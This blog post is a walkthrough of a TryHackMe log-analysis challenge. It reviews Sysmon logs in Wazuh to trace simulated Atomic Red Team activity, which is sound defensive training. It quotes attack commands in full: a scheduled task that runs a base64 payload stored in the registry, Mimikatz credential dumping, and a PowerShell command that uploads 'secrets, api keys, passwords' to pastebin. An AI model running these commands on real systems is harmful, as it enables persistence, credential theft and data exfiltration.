monday_monitor - d3adair.xyz

![[mm0.png]] # TryHackMe Log Analysis Challenge ### Overview This is is a TryHackMe Log Analysis challenge in which we play the role of a analyst working for SwiftSpend Finance who is tasked with analyzing Sysmon logs within the *Wazuh* SIEM in order to confirm proper visibility for the company. The Security team at SwiftSpend is running various tests to emulate threat actor behavior and our goal is to comb through the logs until we find everything that we need. Once we log into the Wazuh instance, we navigate to the *security events* page and run the *Monday_Monitor* query after configuring the date and time range to April 29th, 2024 between the hours of 12:00 and 20:00. ### Room ![[mm1.png]] **Initial access was established using a downloaded file. What is the file name saved on the host?** Let's first start off by adding some more columns to the view we start off with using some potentially interesting fields. You can do this by hovering over a specific field and clicking the + button which will automatically add the field as a column. `rule.mitre.technique` `data.win.eventdata.user` `data.win.eventdata.image` `data.win.eventdata.commandLine` These were the fields that I decided to add to the list of the events just to enhance my view and to make it easier to discern the activity without needing to constantly expand each individual event to get more context. Feel free to add any additional fields that you find interesting to your view, the more context the better! Next I sorted it by time so that we are starting off with the earliest events in the timeline and we can work forwards from the initial activity. ![[mm2.png]] As we can see at the very beginning, there appears to be a system with the name of *ATOMIC* which tells me that we will be investigating activity related to the Atomic Red Team tool. This suspicion is later quickly confirmed however we will get to that later. Our first goal in this analysis is to look for signs of [Initial Access](https://attack.mitre.org/tactics/TA0001/), specifically in regard to downloaded files. Now we need to start combing through the logs to see if we can find any signs of a file download. My first thought was simply just to CTRL+F for "http://" and low and behold, we get a couple of results. ![[mm3.png]] Honing in on this event, we can see PowerShell command being ran which sets a variable, in this case **$url** to point to a specific .xlsm file. It then attempts to download the file using the $url variable and save it to the machine's TEMP directory with the very not-obvious name of `PhishingAttachment.xlsm`. This is definitely a good indicator of an initial access attempt via a file download so let's go ahead and try the first answer with the original name of the .xlsm file. **What is the full command run to create a scheduled task?** Next we are tasked with finding evidence of a scheduled task being created and to provide the command in it's entirety. If we scroll down just a bit from the initial PowerShell download command that was run, we see evidence of `schtasks.exe` being ran and a full command command alongside it. ![[mm4.png]] Let's go ahead and copy the full command starting with `\ "cmd.exe\ "` and drop that into the answer box to see if we got it right. **What time is the scheduled task meant to run?** Looking at the command in-full we can see exactly what it is attempting to do and that it is obviously part of an Atomic Red Team test, specifically testing for MITRE ATT&CK Sub-technique T1053.005 which is classified as Scheduled Task/ Job: Scheduled Task. You can read through the Atomic Red Team GitHub repository entry for this sub-technique if you would like to know more about exactly what is happening. https://attack.mitre.org/techniques/T1053/005/ https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md ``` \"cmd.exe\" /c \"reg add HKCU\\SOFTWARE\\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyB3d3cueW91YXJldnVsbmVyYWJsZS50aG0= /f & schtasks.exe /Create /F /TN \"ATOMIC-T1053.005\" /TR \"cmd /c start /min \\\"\\\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\\\SOFTWARE\\\\ATOMIC-T1053.005).test)))\" /sc daily /st 12:34\" ``` For now however, we need to know what time the created scheduled task is meant to run. We can determine this from the `/st` or *Starttime* flag at the end of the command. We see it is set for 12:34 so once again we will see if this happens to be the correct answer by dropping into the answer box. **What was encoded?** Contained within the command from the previous question, we can see evidence of a base64 encoded command being ran along with a base64 string which we can decode using [CyberChef](https://gchq.github.io/CyberChef/) to discover what is contained within. From this additional information we can make a pretty good determination that this specific command was the result of Test #7 of the Atomic Red Team's arsenal specifically for this sub-technique. `cGluZyB3d3cueW91YXJldnVsbmVyYWJsZS50aG0=` ![[mm5.png]] https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md#atomic-test-7---scheduled-task-executing-base64-encoded-commands-from-registry We are nearing the end of this investigation, only a few more questions to go! **What password was set for the new user account?** Lets continue to scroll through the events to see if we can't find evidence of a new user account being created along with a password being set. The standard syntax on Windows to create a new user and set a password for that user is as follows: ``` net user USERNAME PASSWORD ``` If we know this, we can pretty easily discern any instances of this occurring. In fact, we come across an example fairly quickly and we are able to see an new account with the name "guest" being created along with a password being set. Let's go ahead and see if that is the correct answer. ![[mm6.png]] **What is the name of the .exe that was used to dump credentials?** We're in the home stretch! Our next step is to look for evidence of credential dumping. ![[mm7.png]] Boom. If we scroll down we can see what appears to be *Mimikatz* activity although the executable filename for Mimikatz appears to have been renamed to `memotech.exe`. Mimikatz is an extremely powerful and very well-known credential dumping/credential extraction tool and it is very common to see it employed in these types of scenarios. The `sekurlsa::minidump` is a specific command within Mimikatz that can be used to read from an LSASS minidump file, in this instance, we can see it attempting to read from the `lsass.DMP` file and from there attempt to extract passwords from it. You can read more about Mimikatz and it's capabilities from the entry in HackTricks. https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-mimikatz **Data was exfiltrated from the host. What was the flag that was part of the data?** Finally! The last question...for now. Knowing that evidence of exfiltration will likely be towards the very end of the activity, let's scroll a bit further down and see if we can't find some evidence of exfiltration along with the needed flag. ![[mm8.png]] And there we have it. Another PowerShell command being ran that we can analyze and determine is making POST requests to `pastebin.com` with the goal of uploading confidential stolen data along with some additional data that bares a striking resemblance to the format of a TryHackMe flag. ``` |\"powershell.exe\" & {$apiKey = \\\"\"6nxrBm7UIJuaEuPOkH5Z8I7SvCLN3OP0\\\"\" $content = \\\"\"secrets, api keys, passwords, THM{M0N1T0R_1$_1N_3FF3CT}, confidential, private, wall, redeem...\\\"\" $url = \\\"\"https://pastebin.com/api/api_post.php\\\"\" $postData = @{ api_dev_key = $apiKey api_option = \\\"\"paste\\\"\" api_paste_code = $content } $response = Invoke-RestMethod -Uri $url -Method Post -Body $postData Write-Host \\\"\"Your paste URL: $response\\\"\"}| || ``` And with that out of the way the room is completed and we are on to the next. I will see you there! Take care.